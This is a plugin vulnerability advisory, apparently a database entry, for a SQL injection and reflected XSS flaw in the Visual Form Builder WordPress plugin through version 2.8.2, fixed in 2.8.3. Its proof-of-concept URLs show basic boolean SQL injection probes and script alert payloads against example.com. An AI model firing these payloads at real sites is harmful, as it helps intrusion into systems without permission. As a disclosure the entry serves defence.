Visual Form Builder <= 2.8.2 – SQL Injection & Reflected XSS | Plugin Vulnerabilities

Description

The Visual Form Builder WordPress plugin was affected by a SQL Injection & Reflected XSS security vulnerability.

Proof of Concept

SQL Injection
-------------

http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D2

http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D1

Reflected XSS
-------------

http://www.example.com/wp-admin/admin.php?page=visual-form-builder&s=<script>alert(1)</script>

http://www.example.com/wordpress/wp-admin/admin.php?page=vfb-entries&s=<script>alert(1)<script>

Affects Plugins

visual-form-builder

Fixed in 2.8.3

References

URL

https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_visual_form_builder_xss_scanner.rb

Miscellaneous

Submitter

Tim Coen

Verified

No

WPVDB ID

daa25b72-7ac3-47ce-be69-a1515cee2e91

Timeline

Publicly Published

2015-05-15 (about 10 years ago)

Added

2015-05-15 (about 10 years ago)

Last Updated

2019-10-23 (about 6 years ago)

Other

Published

Title

Published

2014-08-01

Title

RokNewsPager <= 1.17 - XSS,DoS,Disclosure,Upload Vulnerabilities

Published

2015-07-07

Title

NewStatPress < 1.0.6 - SQL Injection

Published

2015-11-21

Title

WP RSS Multi Importer <= 3.15 - Blind SQL Injection & Cross-Site Scripting (XSS)

Published

2016-07-19

Title

Icegram <= 1.9.18 - Cross-Site Request Forgery (CSRF) & XSS

Published

2019-09-30

Title

Theme Editor < 2.2 - Multiple Vulnerabilities